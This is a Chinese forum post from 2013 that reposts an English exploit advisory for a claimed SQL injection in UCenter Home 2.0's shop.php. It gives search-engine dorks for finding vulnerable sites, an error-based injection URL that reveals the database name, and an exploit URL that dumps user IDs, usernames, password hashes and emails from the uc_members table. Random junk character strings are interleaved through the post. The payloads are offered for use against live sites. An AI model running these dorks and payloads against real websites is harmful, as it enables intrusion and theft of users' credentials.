找回密码
 立即注册
查看: 2528|回复: 0
打印 上一主题 下一主题

UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-27 21:31:31 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
% }/ C7 `. F/ ?- ^
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__  2 r8 j0 }# v+ |: K7 X
1 ?: u. Y" O6 j9 q4 }6 e2 A9 M0 t" O
                                 
8 o7 e  j2 [; m9 `: ^# t) {6 U2 L" _  G
*/ Author : KnocKout  
$ |" z* X4 k1 o+ ~- L) C
7 M- D4 }: `7 @; L0 x; G  [2 ]*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers  
8 c# }% Z* t1 L8 @* _8 b9 k: b% \* t& `0 r! N/ d  ~2 U' V4 C/ V
*/ Contact: knockoutr@msn.com  
2 `. V; Z2 P8 s2 l: w) Z3 u0 {6 X
3 I5 ^, p2 y- A; k+ I) k*/ Cyber-Warrior.org/CWKnocKout  * E, ]2 E1 R1 n2 N

/ W& v4 _" T* ]" c& N& q__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  ; E* E2 @% w* Y9 t" X  l
0 f* I9 a$ A: c! g0 d6 T' d1 p
Script : UCenter Home  ( g; L# y' v: q+ {
% X5 d0 r9 z/ S% t: M
Version : 2.0  
' l7 x4 N( h# m4 V- i4 O+ s! N# r4 R  }( I/ M5 [* }; G3 Y7 }
Script HomePage : http://u.discuz.net/  ( K6 s' [# r0 L1 }

% }$ Q" c5 u/ Q  N8 a9 i5 u- l/ H__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
# B) ~6 V) ^6 l: D! o2 j3 W# Q% d* }& X. ?. M6 O) K
Dork : Powered by UCenter inurl:shop.php?ac=view  6 A% H! H. e7 V' i5 N! D
1 S* J" k- l8 W5 n6 ~, T$ Q1 s  G
Dork 2 : inurl:shop.php?ac=view&shopid=  7 L# r8 }9 l8 i" S& }& @/ I- D6 ^
- A4 c- @0 {; {: u# ]) L9 |5 w' N
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  0 U% L* h5 f! {( w% {: Z9 E+ w
4 K; B+ n' i* V. e; d* X
Vuln file : Shop.php  " S* O* @! m" o9 u

4 E$ D: U  ?& ]* avalue's : (?)ac=view&shopid=  5 _: D: v4 b6 K, f

" t7 g% m8 s2 k5 R; t  HVulnerable Style : SQL Injection (MySQL Error Based)  ! _$ `9 ]) H/ W& j" Z- Z
" M7 D; V( c: `  v4 [; M8 N
Need Metarials : Hex Conversion  8 E$ u; Q# e8 f$ e2 S2 K5 A0 |

5 D0 n' N7 i% S__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  0 j4 t, ?6 B3 ?$ Y& }
, T9 q' E: P, u
Your Need victim Database name.   4 F/ A: N7 ?0 R1 J/ W8 N
9 y8 |- ]+ Q+ N' u# ]% f' R
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  
, t5 `2 n) X: ?* w6 n& o
- T0 ~) R' S+ `+ {  {..  5 x# _& n2 J" Z5 U

  W! m+ S8 z' k( t7 l1 pDB : Okey.  # y2 h, z4 z7 F% Z/ f8 }. i
9 v8 J/ a9 z6 n& i+ _1 Y
your edit DB `[TARGET DB NAME]`  
# O5 [0 j) Q5 s3 w: b4 V0 y8 K0 t
; w+ p6 A6 C# e0 z* xExample : 'hiwir1_ucenter'  - Y$ p! V; ]: z2 m* l. @
6 B6 _& t7 P# m+ B& j0 \/ X3 f
Edit : Okey.  3 S4 Z# r% {- |0 Z
" ]5 x9 H: E( V1 e$ Z8 p7 |
Your use Hex conversion. And edit Your SQL Injection Exploit..  , u9 j  e! F, ?$ o. v4 @
# C7 J# w0 _( @/ t+ N
   % Z/ R! Q/ i7 v

3 ?) N, K1 U' U& y' \Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  
4 x; c3 q+ Y/ _: W$ w9 ~: G* Y
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表